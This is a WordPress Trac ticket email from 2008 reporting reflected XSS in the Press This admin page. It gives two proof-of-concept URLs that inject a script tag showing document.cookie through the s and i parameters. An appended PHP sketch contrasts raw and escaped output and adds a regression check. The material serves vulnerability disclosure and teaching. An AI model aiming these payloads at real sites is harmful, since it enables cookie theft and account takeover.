[wp-trac] [WordPress Trac] #7220: Press This vulnerabilities
WordPress Trac
wp-trac at lists.automattic.com
Wed Jul 2 00:57:47 GMT 2008
#7220: Press This vulnerabilities
----------------------+-----------------------------------------------------
Reporter: xknown | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone: 2.6
Component: Security | Version: 2.6
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
After the last commits, Press This is again vulnerable to XSS.
{{{
http://localhost/wp/wp-admin/press-this.php/?ajax=video&s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://localhost/wp/wp-admin/press-this.php/?ajax=thickbox&i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
}}}
--
Ticket URL: <http://trac.wordpress.org/ticket/7220>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
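
The two payloads in the ticket break out of different HTML contexts: `s` closes a `<textarea>`, `i` closes a double-quoted attribute. The sketch below is an added example, not code from press-this.php or from the ticket; the templates and the function names `h`, `render_raw`, `render_escaped` and `contains_script_tag` are hypothetical. It renders both values with and without output escaping and checks the result for a surviving script element.

```php
<?php
// Added illustration; the markup templates are assumptions, not WordPress code.
// Inputs are the URL-decoded s and i values from the ticket's two URLs.
$s = '</textarea><script>alert(document.cookie)</script>';
$i = '"><script>alert(document.cookie)</script>';

// Escape for HTML element content and for quoted attribute values.
// ENT_QUOTES encodes both " and ', so either attribute quoting style is covered.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Unescaped rendering: the value can close the textarea or the attribute.
function render_raw(string $s, string $i): string {
    return '<textarea name="content">' . $s . "</textarea>\n"
         . '<input type="hidden" name="i" value="' . $i . '" />' . "\n";
}

// Same templates, with every request-derived value passed through h().
function render_escaped(string $s, string $i): string {
    return '<textarea name="content">' . h($s) . "</textarea>\n"
         . '<input type="hidden" name="i" value="' . h($i) . '" />' . "\n";
}

// Regression check: does any script element survive in the markup?
function contains_script_tag(string $html): bool {
    return stripos($html, '<script') !== false;
}

foreach (['raw' => render_raw($s, $i), 'escaped' => render_escaped($s, $i)] as $label => $html) {
    echo $label, ': ', contains_script_tag($html) ? 'script tag present' : 'no script tag', "\n";
}

// The escaped markup keeps the payload as inert text.
echo render_escaped($s, $i);
```

Escaping of this kind only prevents breaking out of the element or attribute; a value that ends up in a URL attribute such as `src` or `href` additionally needs its scheme validated.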